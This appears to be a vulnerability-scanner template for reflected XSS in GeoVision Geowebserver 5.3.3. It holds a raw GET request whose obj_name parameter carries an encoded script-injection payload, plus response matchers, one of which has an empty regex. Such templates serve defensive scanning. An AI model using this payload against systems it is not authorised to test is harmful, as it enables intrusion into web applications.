id: geowebserver-xss info: name: GeoVision Geowebserver 5.3.3 - XSS author: madrobot severity: medium reference: https://www.exploit-db.com/exploits/50211 tags: geowebserver,xss requests: - raw: - | GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} Accept: */* matchers-condition: and matchers: - type: regex regex: - "" part: body - type: status status: - 200 - type: word part: header words: - text/html